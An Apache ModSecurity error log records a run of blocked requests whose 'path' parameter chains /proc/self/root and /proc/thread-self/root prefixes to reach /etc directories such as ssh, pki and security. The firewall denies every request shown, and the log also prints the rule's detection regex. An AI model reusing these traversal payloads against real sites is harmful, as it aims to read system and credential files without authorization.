[Mon Mar 16 18:18:01.520403 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.241.46:53944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhziVajLEzk2WiQ-10vfwAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:02.906029 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.241.46:53954] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzirysWC90G-1nBrBhiQAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:04.111284 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:53970] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzjNSswJuvopo3lOh9yAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:05.489153 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:53986] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzjY6lpbStxTqkSkuGFQAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:06.723273 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.241.46:54000] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzjqQpVkWug9HeOt9QiQAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:08.087497 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:54012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzkLysWC90G-1nBrBhjQAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:09.303638 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.241.46:50156] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzkVajLEzk2WiQ-10vhQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:10.628360 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:50162] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzkv9ocpUE4ed4uDwQpgAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:11.783621 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:50178] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzk_9ocpUE4ed4uDwQqAAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:13.145641 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.241.46:50184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzlbysWC90G-1nBrBhjgAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:14.313903 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.241.46:50186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzlkr9dMAiw-8KANNl9wAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:15.709429 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.241.46:50190] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzl0r9dMAiw-8KANNl-gAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:17.463321 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:50204] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzmaQpVkWug9HeOt9QjwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:20.011675 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.241.46:52270] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzmlajLEzk2WiQ-10vjQAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:22.431253 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.241.46:52282] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhznqQpVkWug9HeOt9QlAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:23.782399 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:52298] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzn46lpbStxTqkSkuGGAAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:27.088757 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.241.46:52314] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzo1ajLEzk2WiQ-10vlwAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:28.403197 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:36440] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzpI6lpbStxTqkSkuGGQAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:29.589074 2026] [:error] [pid 29802:tid 140411725141760] [client 74.7.241.46:36452] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzpc_BxrYCr4hPDw8HWgAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:30.901118 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.241.46:36462] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzpqTCbgAP5jq5TehIgwAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:30.947808 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.243.203:58434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzps_BxrYCr4hPDw8HXQAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:18:32.127036 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.241.46:36476] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzqLysWC90G-1nBrBhkwAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
